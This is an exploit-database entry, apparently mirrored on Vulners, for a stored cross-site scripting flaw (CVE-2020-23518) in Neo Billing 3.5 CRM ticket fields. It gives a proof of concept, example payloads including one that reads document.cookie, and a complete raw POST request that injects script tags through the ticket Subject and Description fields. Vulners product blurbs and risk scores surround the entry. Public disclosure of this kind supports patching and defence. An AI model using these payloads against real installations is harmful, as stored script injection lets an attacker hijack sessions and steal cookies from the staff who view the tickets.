Lucene search
K

Neo Billing 3.5 - Persistent Cross-Site Scripting

🗓️ 19 Aug 2019 00:00:00Reported by n1x_Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 237 Views

Neo Billing 3.5 Stored XSS Vulnerability in CR

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-23518
2 Mar 202120:44
circl
CNNVD
UltimateKode Neo Billing 跨站脚本漏洞
2 Mar 202100:00
cnnvd
CNVD
UltimateKode Neo Billing Cross-Site Scripting Vulnerability
4 Mar 202100:00
cnvd
CVE
CVE-2020-23518
2 Mar 202116:53
cve
Cvelist
CVE-2020-23518
2 Mar 202116:53
cvelist
EUVD
EUVD-2020-16262
7 Oct 202500:30
euvd
NVD
CVE-2020-23518
2 Mar 202117:15
nvd
OSV
CVE-2020-23518
2 Mar 202117:15
osv
Prion
Cross site scripting
2 Mar 202117:15
prion
RedhatCVE
CVE-2020-23518
22 May 202516:31
redhatcve
Rows per page
# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
# Date: 18.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79
# CVE: CVE-2020-23518

[Description]

# Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations.
# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability. 

[Proof of Concept]

# 1. Authorization  as customer (regular user account) [//host/neo/crm/user/login]
# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
# 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid] 

[Example paylods]

# Example payload: "><img src="x" onerror="alert('XSS');">
# Example payload: "><script>alert(document.cookie)</script>

[POST Request]

POST /neo/crm/tickets/addticket HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: //host/neo/crm/tickets/addticket
Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
Content-Length: 694
Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
Connection: close
Upgrade-Insecure-Requests: 1
 
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="title"
 
"><script>alert('XSS')</script>
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="content"
 
<p>"><script>alert('XSS')</script><br></p>
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
 
 
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream
 
 
-----------------------------899768029113033755249127523--

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Aug 2019 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 23.5
CVSS 3.15.4
EPSS0.00167
237